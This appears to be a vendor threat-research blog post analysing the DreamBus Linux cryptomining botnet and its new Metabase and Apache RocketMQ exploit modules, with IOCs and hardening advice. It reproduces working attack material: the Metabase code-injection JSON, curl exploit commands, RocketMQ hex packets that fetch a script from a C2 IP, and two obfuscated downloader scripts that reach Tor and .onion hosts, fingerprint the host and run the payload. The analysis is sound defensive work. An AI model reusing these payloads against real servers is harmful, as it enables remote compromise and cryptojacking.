Introduction
Zscaler’s ThreatLabz research team has been tracking the Linux-based malware family known as DreamBus. Not much has changed in the last few years other than minor bug fixes, and slight modifications to evade detection from security software. However, in the last 6 months, the threat actor operating DreamBus has introduced two new modules to target vulnerabilities in Metabase and Apache RocketMQ. This is likely in response to a decrease in new infections stemming from exploits utilized by DreamBus, many of which are dated and have been in use for several years. DreamBus also continues to use techniques that exploit implicit trust and weak passwords including Secure Shell (SSH), IT administration tools, cloud-based applications, and databases. The primary monetization vector for DreamBus infections is still through mining Monero cryptocurrency.
Key Takeaways
- DreamBus is a modular Linux-based botnet dating back to early 2019 with worm-like behavior that can spread across the internet as well as internal networks.
- DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools.
- Infected systems are monetized by mining Monero cryptocurrency using XMRig.
- In June 2023, the DreamBus malware author introduced new changes to the code to further evade detection.
- The threat actor developed two new exploit modules that target vulnerabilities in Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246).
Technical Analysis
Zscaler ThreatLabz has previously analyzed DreamBus and its modules. Each DreamBus module is an Executable and Linkable Format (ELF) binary that is packed by UPX with a modified header and footer. This alteration is designed to prevent the UPX command-line tool from statically unpacking DreamBus binaries. The magic bytes UPX! (0x21585055) are typically replaced with values that change over time. In recent DreamBus samples, the UPX magic bytes have been replaced with the value .gnu (0x756e672e).
DreamBus modules all have a very similar structure. The main difference between each module is the exploit code. Each module scans for servers listening on specific ports, performs exploitation, and if successful, executes shell scripts that download the main DreamBus module, which in turn deploys XMRig to mine Monero cryptocurrency. Each exploit module creates a lock file named /tmp/.systemd.3 to ensure that only one instance is running at a time. Each exploit module scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.
Over the last 6 months, ThreatLabz observed DreamBus deploy modules for the following applications:
- Metabase (CVE-2023-38646)
- RocketMQ (CVE-2023-33246)
- HashiCorp Consul
- Hadoop YARN
- Redis
- PostgreSQL
- SSH
The most commonly deployed DreamBus modules target PostgreSQL. Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided in the Appendix.
In this blog, we analyze the two exploit modules for Metabase and RocketMQ that were added recently.
Metabase Exploit Module (CVE-2023-38646)
Metabase is a popular business intelligence tool used to analyze and visualize data. The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646, which was first documented in July 2023. The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.
The first step is to scan for Metabase servers listening on port 3000 by sending the following HTTP request:
GET /api/session/properties HTTP/1.1 Host: 127.0.0.1:3000
The DreamBus module checks the response for the string metabase.D to identify whether the server is running Metabase. This string is likely attempting to identify the metabase.DEVICE cookie value. If this string is found, DreamBus stages the exploit by writing the following content to the file /tmp/.json%s (where the format %s string is the IP address of the Metabase server).
{ "token": "setup-token", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;", "advanced-options": false, "ssl": true, "init": "CREATE TRIGGER metabasex BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('bash -c {echo,dmtIenJnCmV4ZWMgJj4vZGV2L251bGwKTEhqRmd4dG49Li8uJChkYXRlfG1kNXN1 bXxoZWFkIC1jMjApCnVQWEFpRGdwPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYW hkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxp IGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCkFjQ1FZZ0N5PSIvdG1wL3N5c3 RlbWQtcHJpdmF0ZS1kZTIzODFjY2JhOGFh...}|{base64,-d}|bash')n$$" }, "name": "meta-base-sex", "engine": "h2" } }
DreamBus then executes the following bash command to send another request to the Metabase server to extract the setup token:
setup_token=$(curl -4fs %s:%d/api/session/properties|grep -Eo
"([[:alnum:]]{8}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum
:]]{12})"|tail -n 1);
After the setup token is extracted, DreamBus uses sed to replace the variable setup-token with the actual value retrieved from the server in the staged exploit file.
sed -i "s/setup-token/$setup_token/g" /tmp/.json%s;
Finally, DreamBus sends the exploit to the server via curl and deletes the staged exploit file in /tmp as follows:
curl -X POST -4fs -H "Content-Type: application/json" -d
@/tmp/.json%s %s:%d/api/setup/validate &>/dev/null;rm -f /tmp/.json%s
If the exploit is successful, the following bash script will download and execute the DreamBus main module:
exec &>/dev/null LHjFgxtn=./.$(date|md5sum|head -c20) uPXAiDgp=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw) AcCQYgCy="/tmp/systemd-private-de2381ccba8aa44b77bda1c971a33b5e-system d-logind.service-vkHzrg" VdHfWQsU="curl -m60 -fsSLkA- --doh-url https://${uPXAiDgp[$((RANDOM%${#uPXAiDgp[@]}))]}/dns-query" JtkrXMaj="curl -m60 -fsSLkA-" MTWuGlJu="relay.tor2socks.in" PcSKnocJ="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad" PATH=/tmp:$AcCQYgCy:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin :/usr/local/sbin:$PATH jJcSNhfn() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0rnUser-Agent: -rnHost: ${HOST}rnrn" >&3 (while read line; do [[ "$line" == $'r' ]] && break done && cat) <&3 exec 3>&- } wtJymANw() { for i in $AcCQYgCy . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } OUneYJaz() { beKjoWyW=/exec yXCmWOnw=mb0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1) $VdHfWQsU -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $VdHfWQsU -e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn } ZVdmcgjf() { chmod +x $LHjFgxtn;$LHjFgxtn;rm -f $LHjFgxtn } RAKjFxFv() { u=$PcSKnocJ.tor2web.re/load/ cd /tmp && curl -V || (jJcSNhfn http://$u/cu) | tar zxp wtJymANw OUneYJaz $PcSKnocJ.tor2web.re || OUneYJaz $PcSKnocJ.tor2web.in || OUneYJaz $PcSKnocJ.tor2web.it ZVdmcgjf } ls /proc/$(head -1 /tmp/.systemd.1)/maps || RAKjFxFv rm -f /home/user/.bash_history
Apache RocketMQ Exploit Module (CVE-2023-33246)
Apache RocketMQ is an open source distributed messaging and streaming platform that was originally created by Alibaba in 2012. In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.
The DreamBus RocketMQ exploit module scans for vulnerable servers on port 10911 by sending the following request to a target server:
00000000 00 00 00 c8 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":| 00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan| 00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o| 00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial| 00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP| 00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi| 00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe| 00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke| 00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh| 00000090 20 2e 20 65 63 68 6f 20 63 75 72 6c 20 2d 66 73 | . echo curl -fs| 000000a0 53 6b 4c 41 2d 20 39 32 2e 32 30 34 2e 32 34 33 |SkLA- 92.204.243| 000000b0 2e 31 35 35 3a 38 30 38 30 2f 72 6f 6b 65 74 20 |.155:8080/roket | 000000c0 2d 6f 20 72 65 6b 65 74 65 64 3b 0a |-o reketed;.|
The first 4 bytes of the packet is the full message size (big endian), followed by 4 bytes for the size of the command (also big endian) within the curly braces. The code value 25 is used to call an update configuration function that is invoked without properly validating whether the client has the necessary permissions. As a result, an unauthenticated attacker can update the broker configuration file and most importantly the rocketmqHome variable to execute arbitrary commands. In this instance, the DreamBus module is setting the rocketmqHome variable in the configuration to the value:
-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;
If the RocketMQ server is vulnerable, this shell command will use curl to download a malicious bash script and write it to a file named reketed. Example content of this script is shown below:
z3glwn;rm -f reketed exec &>/dev/null BDrFYzWg=./.$(date|md5sum|head -c20) qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw) sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-system d-logind.service-z3glwn" GRPoNTxD="curl -m60 -fsSLkA- --doh-url https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query" ZwJtGQaC="curl -m60 -fsSLkA-" HNPDsmwz="relay.tor2socks.in" HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad" PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin :/usr/local/sbin:$PATH eGiAsomX() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0rnUser-Agent: -rnHost: ${HOST}rnrn" >&3 (while read line; do [[ "$line" == $'r' ]] && break done && cat) <&3 exec 3>&- } bCQYhArV() { for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } XNSBjYOO() { HoVCQHFu=/exec LouMQEck=rq1_$(curl -s4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1) $GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg } MPQKanDg() { chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg } dtOFCAtT() { u=$HyMbvhNq.tor2web.it/load/ cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp bCQYhArV XNSBjYOO $HyMbvhNq.tor2web.it || XNSBjYOO $HyMbvhNq.tor2web.in || XNSBjYOO $HyMbvhNq.tor2web.re MPQKanDg } ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT
The DreamBus RocketMQ exploit module checks for the string opaque in the response to determine whether the exploit was successful. If the exploitation attempt was successful, the module then sends the following request to the RocketMQ server to execute the bash script:
00000000 00 00 00 a2 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":| 00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan| 00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o| 00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial| 00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP| 00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi| 00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe| 00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke| 00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh| 00000090 20 2e 20 65 63 68 6f 20 62 61 73 68 20 72 65 6b | . echo bash rek| 000000a0 65 74 65 64 3b 0a |eted;.|
The bash script will then download and execute the main DreamBus module.
Conclusion
DreamBus continues to pose a threat to organizations with brute force attacks against PostgreSQL, SSH, and Redis along with new exploits that target recent vulnerabilities in popular business applications. Zscaler ThreatLabz recommends that organizations properly secure all applications that are both publicly and privately accessible. Strong passwords and multi-factor authentication (MFA) should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify potential compromises.
Zscaler Coverage
Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below:
- ELF32.Coinminer.DreamBus
- ELF32.Coinminer.XMRig
- Linux.Worm.SSHSpreader
Indicators of Compromise (IOCs)
The following IOCs can be used to detect a DreamBus infection.
Samples
SHA256 Hash | Module Name |
---|---|
cd647d4497661bf0a7f9a11fd5ca84d52
f49d4cca74941a31cf631c8f6bc88d2
|
DreamBus PostgreSQL module |
5d1721d4d362ddcdbd0762eccdb4e07b0
cc1c26c7d69da30e024e70c7063c519
|
DreamBus Redis module |
9f49375ae05c16d80e02c21f178429602
f726ce87295b9dfd9458f37956392e3
|
DreamBus Metabase module |
25d7b17521629f0861113b1e9f7653dc1
9c40b1d8f3de685ba29108a0d9fa7aa
|
DreamBus Hadoop Yarn module |
34603862c5086a9063e42d79fb094e8d8
9e3aeef6f8eadf23c6925c6a4201a9c
|
DreamBus Hashicorp Consul module |
b86fa919ab9ebaa3f8ead4f7ef6ee0bb9
4a3a1b7d9583e99598893f2738a1c71
|
DreamBus RocketMQ module |
e52b70a76e382ffd2aff02d1d26269036
c589676ba1f2086051c11cb7997a5a5
|
DreamBus SSH module |
5a55acdae38219411b2f3350db425d888
3d6238e465d07a71cadfe89877df6ac
|
DreamBus XMRig miner |
Network indicators
Domain/IP Address | Description |
---|---|
ru6r4inkaf4thlgflg4iqs5mhqwqubols
5qagspvya4whp3dgbvmyhad[.]onion
|
DreamBus C2 domain |
139.59.150[.]7
|
DreamBus C2 IP address |
92.204.243[.]155
|
DreamBus C2 IP address |
p2pool[.]it
|
DreamBus Monero mining pool |
Host indicators
Filenames | Description |
---|---|
/tmp/.systemd.3 | DreamBus module lock file |
/tmp/.json[ipaddress] | DreamBus Metabase exploit staged payload file |
Password lists
- SSH
- PostgreSQL and Redis (the same password list is currently used for both applications)